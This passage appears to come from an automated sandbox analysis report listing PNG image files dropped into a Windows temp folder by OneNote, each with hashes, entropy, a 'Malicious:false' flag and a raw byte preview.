                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1FBFB941-8B8B-45BE-9707-7A583272CE7F}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1FE03CFA-7DE0-4C49-9F24-9EC0B4519E44}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{200DB03B-8558-4F4E-BD36-22D1B5264126}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{21A82FE4-1BF8-4B70-A4D4-8F89EED8EE0E}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{237E15D5-89F8-41C6-8DD7-8012260DC2B0}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{27E6CC52-F685-4081-A1CA-BA64679103BD}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{28150C96-FADB-45FB-82B5-956BEE302C6D}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2A12B371-3430-40D1-B168-8926AE7D9524}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2B60F732-DB59-475D-A602-D0AC68232838}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2C05AD2A-AC9D-4839-86B8-AAD164888386}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2CC6B4D5-5675-4FB7-8FFD-9F149180D76B}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2DD597F9-EFF5-4055-9B4F-74E556D675EE}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
